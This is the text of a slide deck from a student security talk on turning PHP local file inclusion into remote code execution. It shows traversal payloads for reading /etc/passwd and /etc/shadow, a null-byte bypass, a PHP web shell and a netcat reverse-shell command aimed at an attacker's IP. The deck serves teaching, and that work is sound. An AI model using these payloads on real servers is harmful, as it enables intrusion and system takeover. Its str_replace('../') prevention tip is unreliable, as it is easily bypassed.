LFI to RCE
•
1 like•3,896 views
This document discusses journeying from local file inclusion (LFI) vulnerabilities to remote code execution (RCE). It begins with an introduction and overview. It then covers LFI in detail, explaining how to find and exploit LFI vulnerabilities using directory traversal to read files. Next, it discusses remote file inclusion (RFI) and how it can lead to code execution. Prevention methods are outlined. Finally, it demonstrates exploiting LFI and RFI on a test server, verifying with phpinfo() and ping, before obtaining a reverse shell through a GET request. Common log locations are also listed.
Report
Share
LFI to RCE
- 1. Journey From LFI to RCE -G.Manideep @mani0x00
- 2. #Who am I? Member at #nullhyd Pursuing B.tech 4th year Jack of all,Master of none! Interested in Information Security
- 3. #What is I’m gonna talk? LFI RFI 10% RCE And …. Demo’s ;) − 90%
- 4. #What you need to know? Cd .. (how to change directories :p ) Netcat Little knowledge on Php Ssh Let’s Go!!!
- 5. #Disclaimer
- 6. #Local File Inclusion Local File Inclusion is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected. <?php $page=$_GET[“page”]; include($_GET[“$page”]); Vulnerable !! ?>
- 7. #Local File Inclusion What if the attacker assigns page to be "../../../../etc/passwd". It causes the attacker to read a content from /etc/passwd. Vulnerable Function’s leads to LFI -include() -include_once() -require() -require_once() -fopen()
- 8. #Finding Vul Functions Make Mistakes! :D
- 9. #Local File Inclusion <?php if($_GET[“page”]) { $file = preg_replace(‘/x00.*/’, “” ,$file); include($file); } ?> o In This Case we may use terminator’s(%00) to execute LFI Eg: ?page=../../../../../../../../var/log/auth.log%00
- 10. #Local File Inclusion Some Directories to verify LFI. etc/passwd /etc/shadow /etc/group /etc/security/passwd /etc/security/user /etc/security/environ /etc/security/limits Database Configuration i.e: config.inc.php
- 11. #Remote File Inclusion RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using JavaScript). <?php $file ="http://Somesite/c99.php?"; //$_GET['page']; include($file .".php"); //include (http://Somesite/C99.php?.php) ?>
- 12. #Prevention Do not permit appending file paths directly. Use str_replace(‘../’, ‘ ’, $_GET[‘file’]); If you definitely need dynamic path concatenation, ensure you only accept required characters such as "a-Z 0-9" and do not allow ".." or "/" or "%00" (null byte) or any other similar unexpected characters.
- 13. #Demo On LFI&RFI
- 15. #Exploitation Verifying RCE with phpinfo() Verifying the hack by ping our machine. Getting a Shell
- 16. #Remote Code Execution The Process of executing own script’s on the Web Server Remotely is called “Remote Code Execution”.
- 17. #Verifying the Hack Let’s Ping ourself!
- 18. #Shell Time Include a malicious php code <?php exec($_GET[‘cmd’]); ?> Let’s make a GET request …..&cmd=nc <ip> <port> -e /bin/bash
- 20. #Thanks!